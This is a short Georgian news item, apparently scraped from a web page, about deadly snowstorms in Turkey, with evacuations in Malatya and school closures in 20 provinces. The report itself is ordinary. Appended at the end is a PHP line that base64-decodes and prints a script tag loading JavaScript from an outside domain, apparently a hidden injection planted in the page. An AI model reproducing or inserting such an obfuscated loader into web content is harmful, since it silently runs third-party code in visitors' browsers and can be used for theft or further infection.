celsiusi
ავერსი საქკაბელი

თურქეთში უამინდობას მსხვერპლი მოჰყვა. თურქული მედიის ინფორმაციით, დიდთოვლობის გამო ჰეკიმჰანის რაიონში მწყემსები მთაში ჩაიკეტნენ, რომლებიც მოგვიანებით გამოიყვანეს, თუმცა ერთ-ერთი მათგანი საავადმყოფოში გადაყვანის შემდეგ დაიღუპა.

მალათიის პროვინციაში, ქვეყნის აღმოსავლეთით, გზებზე შექმნილი პრობლემების შემდეგ 787 მოქალაქე გაიყვანეს. დიდთოვლობის, ქარბუქის და ყინვის გამო სწავლა შეჩერებულია თურქეთის 20 პროვინციაში და ხუთი პროვინციის ცალკეულ რაიონებში.

სხვა რაიონებთან ერთად, შეზღუდვები შეეხო ტრაპიზონის, ართვინის, ადანის და გირესუნის რაიონებს. მალათია-კაისერის და მალათია-სივასის მიმართულებებზე სახელმწიფო გზები გადაკეტილია სატრანსპორტო მოძრაობისთვის და უამინდობის გამო გზაზე მყოფი მოქალაქეების უსაფრთხო ევაკუაცია გრძელდება.

57
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");